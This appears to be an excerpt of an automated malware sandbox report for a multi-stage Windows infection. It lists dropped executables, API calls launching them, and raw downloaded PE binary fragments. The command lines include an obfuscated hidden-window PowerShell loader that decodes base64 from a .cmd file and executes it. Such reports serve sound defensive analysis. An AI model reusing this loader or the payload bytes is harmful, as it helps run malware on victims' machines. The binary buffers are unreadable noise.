file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\wspconfig.dll
file C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe
file C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1w99u4.exe
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\CC3260MT.dll
file C:\Users\test22\AppData\Local\Temp\10076170101\lBiQciH.exe
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Install.dll
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\BorlndMm.dll
file C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
file C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
file C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2W7420.exe
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\MindClient.dll
file C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Portal-Ech64.exe
file C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk
cmdline PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd"
file C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
file C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe
file C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
file C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe
file C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe
file C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd
file C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe
file C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
file C:\Windows\Temp\{3C00F4D4-05FB-4560-8F0E-1E24C5F0A8D1}\.cr\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
file C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
file C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $A!S@@@±ÜŽ @±ÜŒy@±Ü@Ü"|@Ü"{@Ü"z#@ 8ü@ 8ì@@~PA¡#zN@¡#€@@è@¡#}@Rich@PEL†­Zà  št¦â°@P@´†´Ð :ü=PvT¤v0p@°à4‚.text7™š `.rdata`í°îž@@.data0  Œ@À.wixburn8À–@@.rsrc :Ð<˜@@.relocü=>Ô@B¡°D£8¶FጰD£@¶Fá °D£X¶FሰD£D¶FᄰD£H¶Fá°D£<¶FူD£L¶Fá°D£P¶Fá|°D£T¶FáT³D£Ü¶FÃÌÌU‹ìƒì0¡ F3ʼnEüS‹]3ÀV‹uWP‰EЃÏÿ‰EԍEÔPÇEØ`´DÇEÜx´DÇEàˆ´DÇEä ´DÇE踴DÇEìдDÇEðè´DÇEôµDÇEøµDèê"…Àxjh€jjjh€ÿuÔÿä°D‹øVè@…Àtèïë j EØPè[EÐPÿuVWSèl@‹ðƒÿÿtWÿà°Dƒ}ÔtÿuÔèñD…öx‹uЋMü‹Æ_^3Í[èÏ‹å]ÂU‹ì‹EƒÀüPÿì°D]ÂU‹ìQSVW3öVVjV‰uüÿð°Dh8µDÿø°D‹ØhLµDSÿè°D‹=ô°D…Àt hÿЅÀu9ÿ×hhµDSÿè°D…Àt h4µDÿЅÀuÿ×9u v‹}EüPÿ4·è7&F;u rî_^[‹å]Â3ÀPPjPÿð°DÃU‹ìQQVW3ÿEüWh|µDP‰}ü‰}øè½ ‹ð…öxbWÿuEüPèª ‹ð…öxOEøPÿuüÿL³D…Àu-ÿô°D‹ð…ö~ ·öÎ€…öx¾@€VjchµDè¤%ëH‹E‰‹E ‹MøI‰9}ütÿuüè™C_‹Æ^‹å] U‹ìQSVW‹}3Û3ö‰]ü9t1ÿ7è)‹ðƒþÿu ¸W€é„EüÑîPhÿÿÿÿ7èÔ …Àxn‹]ü‹}…ÿuEPhÿÿÿÿu èµ …ÀxO‹}‹ÎG+Ë;Èsÿu;‹]4EVSè…Àx&ë‹]ƒ;thjjWÿu Vÿ3èYë¸ÿÿ€_^[‹å]ÂU‹ìƒì ƒeüSV‹uW3ÿ!}ø‰}ô9>t,ÿ6èO(‹ø‰}ôƒÿÿu ¾W€éšÿ6‹ßÿ±DÑë‰Eøuÿu »SV腋ð…öxt‹}üÿu‹EÿuSÿ0è! ‹ðþz€u*‹E…ÿu‹8‹Møƒ 3Òf‰Oÿu ÛSPè@‹ð…öx3öFƒþt¶‹Ç‰}ü‹}ô…Àtƒ} t‹È…ÿt ÆAƒïu÷Pèä%_‹Æ^[‹å]ÂU‹ì‹E V=ÿÿÿr¾€ë]W‹}Àƒ?t-3ö9utM ‰u QVPÿ7è¡&‹ð…öx4‹E ëVPÿ7èh&ë jPè½$3ö…Àu¾€Vjmh µDèw#ë‰_‹Æ^] U‹ì‹ESV3öƒËÿ90tÿ0è'‹ð;óu¸W€ë[ÑîW‹}…ÿu ÿu ÿ±D‹øO;Ïr‹ÙÀ%€;Ïr1;ósÿu‹óS‹]Sè&ÿÿÿ…Àxë‹]hjjWÿu Vÿ3èŽ_^[]ÂU‹ìf‹Ej0Yf;Èw fƒø9w*ÁëjaYf;Èw fƒøfw,Wë,7]ÂU‹ì‹M‹E …Éx‰3Àëƒÿ¸€]ÂU‹ìS‹]VW‹}Wÿu Sèó ‹ð…öx`…ÿuEPhÿÿÿÿ3èþ‹ð…öxF‹}Wÿ3Wÿ3ÿujÿ±D…Àu.ÿô°D‹ð…ö~ ·öÎ€…öx¾@€Vhq h µDè"_‹Æ^[]ÂU‹ìƒì ‹E V%W‹} ‰Eôt8‹M3ö…Éu…ÿuÿÿÿÿv¾W€…öx…ÿtE PWQèê‹ð‹E ë'3Àë&3ö…ÿtÿÿÿÿv¾W€…öx E PWÿuëÏ3À‹M‰Eü…öˆS‹ß+؉U }ÿÿÿ‰]ør ¾W€é§ƒ}ô‹Mt …Éu ƒe¹œµD‹E 3ö©àÿÿt ‹M¾W€ë~ƒûw&9u„ €9„—‹M‹ñ÷Þöƒæ#ÆW€ëSÿu!uEQPSRè.‹U ‹ðU+]‰U ‰]ø…öx&‹M ÷ÁtQƒûvLCÿP¶ÁPBPèŽáƒÄ ë3‹M‹E ©t…ÿtPEøPE PÿuüWQè,‹]ø…öyþz€u‹U ‹E…Àt‰‹E…Àt‰[_‹Æ^‹å]ÂU‹ìƒì ‹E V%W‹} ‰Eôt<‹M3À‹ð…Éu…ÿuÿÿÿÿv¾W€…öx…ÿtE PWQè•‹U ‹ð3Àë)‹Ðë(3À‹ð…ÿtÿÿÿÿv¾W€…öx E PWÿuëˋЋM‰Uü…öˆS‹ßQ+]ü}ÿÿÿ‰U ‰]ør¾W€ë(ƒ}ô‹Mt …Éu¹4µD‰E÷E àÿÿ‹ðt[¾W€‹M‹E ©t…ÿtPEøPE Pÿuü?PQè å‹]ø…öyþz€u‹U ‹E…Àt‰‹E…Àt‰[_‹Æ^‹å]ƒûwƒ}tØf9tӋM‹ñ÷Þöƒæ#ÆW€ë‰ÿu‰EEQPSRè‹M‹ð‹U +ى]øJ‰U …öˆYÿÿÿ‹M ÷Át‡ƒûv‚ƒø†vÿÿÿƒÀþP¶ÁPBPè—៎ éZÿÿÿU‹ìQQ‹U ¹ÿÿÿSV‹Â3ö%»W€W‹} ‰Eøt‹E…Àu…ÿu;ùv‹óë3ö…ÿt;ùv‹ó‹E…öˆ‹ß‰E ‰]ü9Mr¾W€…ÿ„´Æé¬ƒ}ø‹Mt …Éu ƒe¹œµD3ö÷Âàÿÿt¾W€…ÿ„ƒÆë~…ÿu#9u„¡€9„˜‹ð÷Þöƒæ#ÆW€ëWÿu!u QM QWPè‹M ‹ð‹E‹ß+ى]ü‰U …öx,‹U ÷ÂtƒûvCÿP¶ÂP‹E @PèwÞ‹EƒÄ …öy0‹M ÷Át…ÿtQMüQM QjWPè‹]ü…öyþz€u‹E…Àt‹M ‰‹E…Àt‰_‹Æ^[‹å]ÂU‹ìQQ‹M 3ÒS‹Á»W€V%‹òW‹} ‰Eø¸ÿÿÿt‹U…Òu…ÿu;øv‹óë …ÿt;øv‹ó‹U…öˆ/‹ß‰U ‰]ü9Er¾W€…ÿ„É3Àf‰鿃}ø‹Et …Àu ƒe¸4µD3ö÷Áàÿÿt¾W€…ÿ„–3Àf‰錅ÿu%9u„²3Éf9„§‹ò÷Þöƒæ#ÆW€ëeÿu3ÉPE ‰M PWRèi‹M ‹ð‹U‹ß+ى]üJ‰E …öx6‹M ÷Át'ƒûv"ƒøvƒÀþP¶ÁP‹E ƒÀPèðÜ‹UƒÄ …öy33ɋE ©
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYˆØŒYˆØŒYˆØŒ3”ÚŒpˆØŒYˆÙŒ[ˆØŒë”ÈŒ[ˆØŒYˆØŒVˆØŒáŽÞŒXˆØŒRichYˆØŒPELª»‹dà  Þ´`J@JM³ @€[ðoàˆ ÐJ@à.rsrcˆàZ@À.idata ð^@À P)`@àrlraejgdP0öb@àepgvbkxuPJX @à.taggant0`J"\ @à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† WPþgð" BdH<@@` $ (  ¸)0 Ô °Ý(Ðu@X' .textF@B `.rdata\÷`øJ@@.datax<` B @À.pdata¸)  *V @@.B6ûÐ € `.gxfgà „ @@.retplneŒ ¤ .tls  ¦ @À_RDATAô ¨ @@.relocÔ 0 ª @B.jssv@ v´ @À.jssvÀv*@ÀAWAVAUATVWUSHì¸H‹¦S H1àH‰„$°‹-™c ‹5—c }ÿ¯ý‰û÷Ӂ累$.‰ÝåKPÛÑ ýõJPÛуãþ ë‰Ý÷Ձå⠋ãôto ëóôto”D$ZA”ÀA•Áƒþ ŸÃƒþ œD$[œÀDˀóD0ÀA‰ØA À0ØDÀ½ÀçÄ{à†Dè‰l$T½Ù ñDè‰l$P½ÒtD¸¡£l-Dè‰l$L½{£œ/Dè‰l$H½A„Í,¸ðÖ)Dè‰l$D½áD  Dè‰l$@½$ v¯¸Ð¨-Dè‰l$<‰T$8ºhñ¡fDЉT$4ºÚۺ̸ZɍDЉT$(ºû × DЉT$0AºF­9ð¸‡&äíDDк-‚]HDЉT$,A½¼áf¸È2cGDDè¸á†ùA¿~ºÙ-A¼>¬ùA‰Á=T€ÏfAùÉKÕߎÉAùØ ñŽáAùá†ùŽ¿Aùá†ù„ÍAùƒgç„D‰ÈAùû × u©‹D$h‹”$9œD$o‹D$(두AùÒtDŽ3Aù»áfޝAùy©z޵AùÀ预 D‰ÈAùy©z…Lÿÿÿ‹D$$‰„$Œ‹D$ ‰„$‹D$,é-ÿÿÿf.„Aù¯¿J«<AùYɍxAù¤{à†„eD‰ÈAùn„…éþÿÿH‹D$p¾8D‰Ú÷ҁâ @¬D‰Ø%0 ЉÁó 5îoÏÿD‰ÚòÓ°p¬D!ډþ÷։ýõÓ°p¬!î!ý‰×÷×A‰ÀAàŸòãÃ0` D à øçŸòâçp` ú1Ú÷РЉó÷Ӊê÷҉߁çË¹ïæ4ðF þ Ӂâ˹ïå4ðF Õ1õ÷Ó ë‰Â÷ҁâ\¶Å%£pI: ЉÚ÷ҁâ\¶Åã£pI: Ó1ÃiӕéÑ[D‹„$Œ‰Ó÷ӉØ%Á½âï>€B ‰փöòËÛS<‰Ø÷ÐD‰ÅõÛS<D!ÅAÈ$ê¬ÃD‰Ç÷ׁÊ¢ˆ€âǶˆæS, ցãǶˆ% H$C Ø1ð‰ê÷ÒD‰Ãã÷iŸç@8 ßA Ёâ÷iŸå–`ú Õ1ýA÷ÐA è‰Â÷ҁâ%ÛOˆ%Ú$°w ÐD‰Â÷ҁâ%ÛOˆAàÚ$°wA ÐA1À¸Àé¢éQýÿÿAù@„Í,ŸAùïÖ)ÎAùU€Ï„ÕD‰ÈAù“Æ…ýÿÿH‹D$xHƒø¸uõÿ*ºÊKÕßLÂE1öéûüÿÿAù¿çÄAùÊKÕß„D‰ÈAù‡&äí…Ñüÿÿ¸-‚]HéÇüÿÿAù,‚]H­AùÒtD„ëD‰ÈAùÈ2cG…üÿÿH‰Œ$˜H‹„$˜H‰„$ ¸¯ê=ވš'~)=߈š'tU=~ºÙ-„Ë=‚–9Tuàé¹f.„=¯ê„+=M[ب„F=>¬ùu³H‹„$˜¸ßˆš'=ވš'¦ëÍH‹¼$˜‹k^ hÿ¯è‰è÷ЉÁãÂå‹Ìå=t3 ݁õ<t31è…è•Àƒ=A^ ŸÃ‰ÚÂ0ÃA‰ÙA0ф۸>¬ù»M[بEÃH‹7„ÒAEÄH‰´$¨E„ÉDÃ=ވš'(ÿÿÿéLÿÿÿ‹ò] ‹=ð] Xÿ¯Ø‰Ý÷Ձ㼭@â‰è%CR¿ Ø5BR¿ƒåþ ŃýÿA•Á”Àƒÿ œÂƒÿ ŸÃ ØD ʉØD ÈD0ËÉØ0н߈š'AEì„۸߈š'EńÒDÅ=ވš'¦þÿÿéÊþÿÿHƒy¸‚–9TAGÇH‹”$ =ވš'€þÿÿé¤þÿÿH‹„$¨¸‚–9T=ވš'cþÿÿé‡þÿÿAù>^±æAù°¿J«„%D‰ÈAù$ v¯…­úÿÿ‹D$@é¤úÿÿAùϨ-ÙAùA„Í,„D‰ÈAù¡£l-…zúÿÿ‹„$‹„$‹„$‹„$‹„$H‹D$`‹„$Œ‹„$Œ‹„$Œ‹„$‹„$‹„$‹„$‹„$¸{£œ/éúÿÿAùÙ ñ„”D‰ÈAù˅Kù…óùÿÿHcD$hHÁàHD$`H‰D$pH‹AH‰ÂH÷ÒH‰ÕHƒåüƒàH èH1ÂH!ÂH‰T$x¸ƒgçé´ùÿÿAù¼áf„„D‰ÈAùF5Nq…—ùÿÿ‹D$HéŽùÿÿAùZɍ„xD‰ÈAùáD  …qùÿÿ‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL£hýgà tz@t@0@…,¤<@°Ì¬Ø¥p.textCrt `.rdata֐x@@.data„°|–@À.rsrc°Ì@Î@@.reloc¬à@BúôÃÌÌÌÌÌÌÌÌÌÌÌÌÌUSWVƒì‹L$(1À…É„vf9MZ…k‹q<<1PE…[öD1 „P‹T1x…Ò„Dƒ|1|„9‹l…í„-)‰D$‹D ȉD$ ‹D$ȉ$1ۉl$f‹D$ ‹˜Ⱥÿÿÿÿ1ö‰÷€|Rvuñ…Ò„¿‰\$1ۃú‚x‰ÖÁî1ۃþtIÁïƒçþ1ÛfD·0Þ·XÁã 1óÁæ1Þ·hõÁî õ·pÁæ 1îÁå1õƒÀ‰ëÁë ëƒÇþuÅö‹l$t·Ó·@Áà 1ØÁã1ÉØÁè ÍÝ1؉ÂÁê‰ÐÁà1ЉÂÁê‰ÖÁæ1։ðÁèð‹\$;D$,u ë1À;D$,t C1À9ë…ÿÿÿë‹$·X‹T$ ‚‰ÈƒÄ^_[]ÂÌÌÌÌÌÌÌÌÌÌÌWVPd¡0‹@ ‹@ ‹‹‹@‰ÆÇ$hðüT¡Pè6þÿÿƒì(`‘@$ÿЉÇ(p‘@)+F(€‘@)+F(‘@) +F( ‘@)0+F¹€¶‘ý¯@ˆTý¶‘þ¯@ˆTþ¶‘ÿ¯@ˆTÿ¶‘°@ˆƒÁùã uÊj@h+Fhà Wè(ƒÄhrƲ:VèŠýÿÿ‰áQj@hà WÿЉøƒÄ^_ÃÌÌÌÌÌUSWVì‹´$(‹¬$$(°‘@D$(À‘@D$(Б@D$((à‘@D$8(ð‘@D$H(’@D$X(’@D$h( ’@D$x(0’@„$ˆ(@’@„$˜(P’@„$¨(`’@„$¸(p’@„$È(€’@„$Ø(’@„$è( ’@„$ø1É1ÿë$f.„¶D €PˆD AùtV¶D ˆD$‰ûÉÈ1Ò÷ö\‰ß¶Ã¶\$¶TˆT ˆ\öÂt°‰Ê)ÂöÂt€Ãëf€ó7ˆ\Aùuªƒ¼$ „¥1ö1Û1Éé€ÀÀ‰ÂÀê0¶úý‰$‰Èº“$I’÷ê)<$¿“$I’ʉÐÁèÁêÕ)ÂÊ$ˆT,¶D4¶T,‰ÈЍ”ÿIЁâÿÿÿ)Ѝ“ÿ…ÛIӁâÿÿÿ)Ó¶TTÀ‰ÐÀè0жÀÅ)ÉÈ÷ïʉÐÁèÁúÕ)ÂÊÊÚҀòU‰ÓÐëӍQ…ÉIсâð‰È)жӍR‹¼$20ЈA9Œ$ ‹\$„–F–…ÀIЁâÿÿÿ÷ÚÖF¶D4É\$¶ë¶T,ˆT4ˆD,.iú·mÇI·ÿÿ’$v5‰ó¯Ýiû§7½éÇ²ÿ,d! †˜þÿÿö„þÿÿöT4ëf„ÐD4‰ó¯Ý¿“$I’é³þÿÿÄ^_[]ÃÌÌVd¡0‹@ ‹@ ‹‹‹@hðüT¡Pè!úÿÿ(°’@)@+F(À’@)P+F(В@)`+F(à’@)p+Fƒì(ð’@$ÿЉƸf¶ˆÝ¼@ˆLý¶ˆÞ¼@ˆLþ¶ˆß¼@ˆLÿ¶ˆà¼@ˆ ƒÀ=luËj@h@+FhlVèüÿÿƒÄè!ûÿÿ…ÀtVÿÐ^Ã^ébùÿÿÌÌUSWVƒì ¡€+F‰D$· „+F¶¤+F‰L$öá¢È+Fƒ=,FtÆŠ+Ffƒ=,FˆD$x'¡ä+F+ø+F£Ì+F¡Ø+F½†FïL)ņ‰D$ë ½ ÆïLÇD$„ôÒ¶=è+F‰ø+˜+F‹ ,F‰L$ ‹ ´+F‹Ð+FZÿùƒ¼IQ¾–¨ÿÿEó‰t$¿5Œ+F‰t$f£¤+F¸šÿ„˜‹Ì+FúüË,†Á‰î»R‘=,F2fOr·=œ+F·Ú1ûfÇô+F…ä‹=ì+F‘°œ+Y‰ ,F¿-À+F…턺™÷ýf£†+FÇÐ+F†…ö„»‹T$òtüÿÿùƒ¼IQ¸iVEÂ1Ò÷ö˜éžf1ˆ+F·À+Ff¯ø+F‹,F3,F‰Ø+F˜‹Ì+FúüË,‡?ÿÿÿ‹5¨+F·=ˆ+F)þ‰5ð+F¶5’+Fö™ÿÿ‰t$‰î»R‘=,F2fOƒÿÿÿé%ÿÿÿf¸f£†+FÇÐ+F†…ö…Eÿÿÿ¸£°+FÇºÓÿÿ¿ÏñfôF‰ ´+F¿D$52;D$|X‹|$ƒÿ}e¶T$€úƒš¯Ï¡à+F€@£¼+F¶Â£,F‰Ê€=Ô+F†„†‹ ¨+Fù·§r:„Žéœ‹D$4ƒð&f£†+F‹|$ƒÿ|›¿ô+F¯Ø‰Œ+F¸‹\$ ûÓxtóÓx¡¼+F1Ò÷ó£ð+F¶T$€ú‚fÿÿÿ¡,F‹T$€=Ô+F†…zÿÿÿ‹ ¬+F œ+F‰ ¨+Fù·§r:u‹ ð+F ä+Ff‰ ,F¿Ê; ¸+F µh£´+FÇD$ƒD$4% +F• ߀ Ô+FÃi,F>\ô£,FƒÄ ^_[]ÃÌÌÌÌÌÌÌÌÌÌÌUSWVƒì‹ ø+FùþÔu ¿]f»]ë)¸M^–ù +F£ü+Fǰ+F·¤+FiØTãÿÿ1ÿÇÜ+FëI‘ ¶¨+F4i¢È+F¡à+F‰D$9ȉL$}8f¸·f+Ø+Ff£,F¶Ô+FiÀëI‰$‹ ¬+F…Ét¸FT1Ò÷ù‰Æëf¸þԉ$f½ô(¾þÿYA뾸wåª÷-¸+F‰Õ‰ÐÁèÁýſ͡˜+FÀ‰L$ 9 ì+F¹tAttEÈ·ˆ+F9ä+FrÇä+F׉Ⱥ¢’+F¡œ+F;Ø+F‰t$sG‹5˜+Fºñ0µ‰ð÷ê‰Óó‰ØÁèÁëÃǬ+F ‰=ü+FÇD$4¡ ,F‰D$=:bt(ë^‹=ü+FÇD$?ÿ·gás$¡ ,F‰D$=:bu8‹t$0f…ítN‹D$™÷|$ ëH·+Fº2§Ê)‰œ+F¡ ,F‰D$=:btȶÔ+F5U£”+F¹+t
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† WPþgð" BdH<@@` $ (  ¸)0 Ô °Ý(Ðu@X' .textF@B `.rdata\÷`øJ@@.datax<` B @À.pdata¸)  *V @@.B6ûÐ € `.gxfgà „ @@.retplneŒ ¤ .tls  ¦ @À_RDATAô ¨ @@.relocÔ 0 ª @B.jssv@ v´ @À.jssvÀv*@ÀAWAVAUATVWUSHì¸H‹¦S H1àH‰„$°‹-™c ‹5—c }ÿ¯ý‰û÷Ӂ累$.‰ÝåKPÛÑ ýõJPÛуãþ ë‰Ý÷Ձå⠋ãôto ëóôto”D$ZA”ÀA•Áƒþ ŸÃƒþ œD$[œÀDˀóD0ÀA‰ØA À0ØDÀ½ÀçÄ{à†Dè‰l$T½Ù ñDè‰l$P½ÒtD¸¡£l-Dè‰l$L½{£œ/Dè‰l$H½A„Í,¸ðÖ)Dè‰l$D½áD  Dè‰l$@½$ v¯¸Ð¨-Dè‰l$<‰T$8ºhñ¡fDЉT$4ºÚۺ̸ZɍDЉT$(ºû × DЉT$0AºF­9ð¸‡&äíDDк-‚]HDЉT$,A½¼áf¸È2cGDDè¸á†ùA¿~ºÙ-A¼>¬ùA‰Á=T€ÏfAùÉKÕߎÉAùØ ñŽáAùá†ùŽ¿Aùá†ù„ÍAùƒgç„D‰ÈAùû × u©‹D$h‹”$9œD$o‹D$(두AùÒtDŽ3Aù»áfޝAùy©z޵AùÀ预 D‰ÈAùy©z…Lÿÿÿ‹D$$‰„$Œ‹D$ ‰„$‹D$,é-ÿÿÿf.„Aù¯¿J«<AùYɍxAù¤{à†„eD‰ÈAùn„…éþÿÿH‹D$p¾8D‰Ú÷ҁâ @¬D‰Ø%0 ЉÁó 5îoÏÿD‰ÚòÓ°p¬D!ډþ÷։ýõÓ°p¬!î!ý‰×÷×A‰ÀAàŸòãÃ0` D à øçŸòâçp` ú1Ú÷РЉó÷Ӊê÷҉߁çË¹ïæ4ðF þ Ӂâ˹ïå4ðF Õ1õ÷Ó ë‰Â÷ҁâ\¶Å%£pI: ЉÚ÷ҁâ\¶Åã£pI: Ó1ÃiӕéÑ[D‹„$Œ‰Ó÷ӉØ%Á½âï>€B ‰փöòËÛS<‰Ø÷ÐD‰ÅõÛS<D!ÅAÈ$ê¬ÃD‰Ç÷ׁÊ¢ˆ€âǶˆæS, ցãǶˆ% H$C Ø1ð‰ê÷ÒD‰Ãã÷iŸç@8 ßA Ёâ÷iŸå–`ú Õ1ýA÷ÐA è‰Â÷ҁâ%ÛOˆ%Ú$°w ÐD‰Â÷ҁâ%ÛOˆAàÚ$°wA ÐA1À¸Àé¢éQýÿÿAù@„Í,ŸAùïÖ)ÎAùU€Ï„ÕD‰ÈAù“Æ…ýÿÿH‹D$xHƒø¸uõÿ*ºÊKÕßLÂE1öéûüÿÿAù¿çÄAùÊKÕß„D‰ÈAù‡&äí…Ñüÿÿ¸-‚]HéÇüÿÿAù,‚]H­AùÒtD„ëD‰ÈAùÈ2cG…üÿÿH‰Œ$˜H‹„$˜H‰„$ ¸¯ê=ވš'~)=߈š'tU=~ºÙ-„Ë=‚–9Tuàé¹f.„=¯ê„+=M[ب„F=>¬ùu³H‹„$˜¸ßˆš'=ވš'¦ëÍH‹¼$˜‹k^ hÿ¯è‰è÷ЉÁãÂå‹Ìå=t3 ݁õ<t31è…è•Àƒ=A^ ŸÃ‰ÚÂ0ÃA‰ÙA0ф۸>¬ù»M[بEÃH‹7„ÒAEÄH‰´$¨E„ÉDÃ=ވš'(ÿÿÿéLÿÿÿ‹ò] ‹=ð] Xÿ¯Ø‰Ý÷Ձ㼭@â‰è%CR¿ Ø5BR¿ƒåþ ŃýÿA•Á”Àƒÿ œÂƒÿ ŸÃ ØD ʉØD ÈD0ËÉØ0н߈š'AEì„۸߈š'EńÒDÅ=ވš'¦þÿÿéÊþÿÿHƒy¸‚–9TAGÇH‹”$ =ވš'€þÿÿé¤þÿÿH‹„$¨¸‚–9T=ވš'cþÿÿé‡þÿÿAù>^±æAù°¿J«„%D‰ÈAù$ v¯…­úÿÿ‹D$@é¤úÿÿAùϨ-ÙAùA„Í,„D‰ÈAù¡£l-…zúÿÿ‹„$‹„$‹„$‹„$‹„$H‹D$`‹„$Œ‹„$Œ‹„$Œ‹„$‹„$‹„$‹„$‹„$¸{£œ/éúÿÿAùÙ ñ„”D‰ÈAù˅Kù…óùÿÿHcD$hHÁàHD$`H‰D$pH‹AH‰ÂH÷ÒH‰ÕHƒåüƒàH èH1ÂH!ÂH‰T$x¸ƒgçé´ùÿÿAù¼áf„„D‰ÈAùF5Nq…—ùÿÿ‹D$HéŽùÿÿAùZɍ„xD‰ÈAùáD  …qùÿÿ‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

